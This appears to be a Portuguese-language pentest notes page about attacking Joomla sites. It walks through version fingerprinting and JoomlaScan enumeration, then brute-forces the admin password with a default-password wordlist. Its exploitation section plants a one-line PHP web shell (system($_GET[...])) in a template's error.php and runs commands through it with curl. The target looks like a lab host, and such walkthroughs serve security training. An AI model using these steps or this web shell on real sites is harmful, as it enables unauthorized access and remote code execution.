Joomla

Enumeração

Podemos coletar impressões digitais do Joomla observando o código-fonte da página.

curl -s http://dev.site.local/ | grep Joomla

O arquivo robots.txt para um site Joomla geralmente terá esta aparência:

# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
# eg the Disallow rule for the /administrator/ folder MUST
# be changed to read
# Disallow: /joomla/administrator/
#
# For more information about the robots.txt standard, see:
# https://www.robotstxt.org/orig.html

User-agent: *
Disallow: /administrator/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/

Podemos imprimir a versão do Joomla se o arquivo README.txt está presente.

curl -s http://dev.site.local/README.txt | head -n 5

1- What is this?
	* This is a Joomla! installation/upgrade package to version 3.x
	* Joomla! Official site: https://www.joomla.org
	* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
	* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging

Em certas instalações do Joomla, podemos imprimir a versão de arquivos JavaScript no diretóriomedia/system/js/ ou navegando para administrator/manifests/files/joomla.xml.

curl -s http://dev.site.local/administrator/manifests/files/joomla.xml | xmllint --format -

<?xml version="1.0" encoding="UTF-8"?>
<extension version="3.6" type="file" method="upgrade">
  <name>files_joomla</name>
  <author>Joomla! Project</author>
  <authorEmail>admin@joomla.org</authorEmail>
  <authorUrl>www.joomla.org</authorUrl>
  <copyright>(C) 2005 - 2019 Open Source Matters. All rights reserved</copyright>
  <license>GNU General Public License version 2 or later; see LICENSE.txt</license>
  <version>3.9.4</version>
  <creationDate>March 2019</creationDate>
  <SNIP>

Utilizando JoomlaScan

python2.7 joomlascan.py -u http://dev.site.local

-------------------------------------------
      	     Joomla Scan                  
   Usage: python joomlascan.py <target>    
    Version 0.5beta - Database Entries 1233
         created by Andrea Draghetti       
-------------------------------------------
Robots file found: 	 	 > http://dev.site.local/robots.txt
No Error Log found

Start scan...with 10 concurrent threads!
Component found: com_actionlogs	 > http://dev.site.local/index.php?option=com_actionlogs
	 On the administrator components
Component found: com_admin	 > http://dev.site.local/index.php?option=com_admin
	 On the administrator components
Component found: com_ajax	 > http://dev.site.local/index.php?option=com_ajax
	 But possibly it is not active or protected
	 LICENSE file found 	 > http://dev.site.local/administrator/components/com_actionlogs/actionlogs.xml
	 LICENSE file found 	 > http://dev.site.local/administrator/components/com_admin/admin.xml
	 LICENSE file found 	 > http://dev.site.local/administrator/components/com_ajax/ajax.xml
	 Explorable Directory 	 > http://dev.site.local/components/com_actionlogs/
	 Explorable Directory 	 > http://dev.site.local/administrator/components/com_actionlogs/
	 Explorable Directory 	 > http://dev.site.local/components/com_admin/
	 Explorable Directory 	 > http://dev.site.local/administrator/components/com_admin/
Component found: com_banners	 > http://dev.site.local/index.php?option=com_banners
	 But possibly it is not active or protected
	 Explorable Directory 	 > http://dev.site.local/components/com_ajax/
	 Explorable Directory 	 > http://dev.site.local/administrator/components/com_ajax/
	 LICENSE file found 	 > http://dev.site.local/administrator/components/com_banners/banners.xml

<SNIP>

A conta de administrador padrão nas instalações do Joomla é admin, mas a senha é definida no momento da instalação. Podemos fazer brute force com joomla-brute

python3 joomla-brute.py -u http://dev.site.local -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
 
admin:admin

Exploração

Vamos fazer login no backend de destino em http://dev.site.local/administrator usando admin:admin.

A partir daqui, podemos clicar em Templates no canto inferior esquerdo abaixo Configuration para abrir o menu de modelos, Em seguida podemos clicar no nome de um modelo e costumizar.

Vamos escolher o error.php página. Adicionaremos uma linha única em PHP para obter a execução do código da seguinte maneira.

system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e']);

Depois que isso estiver pronto, clique em Save & Close na parte superior e confirme a execução do código usando CURL.

curl -s http://dev.site.local/templates/protostar/error.php?dcfdd5e021a869fcc6dfaef8bf31377e=id

AnteriorCMS

Atualizado há 1 mês

hashtagEnumeração

hashtagExploração

Enumeração

Exploração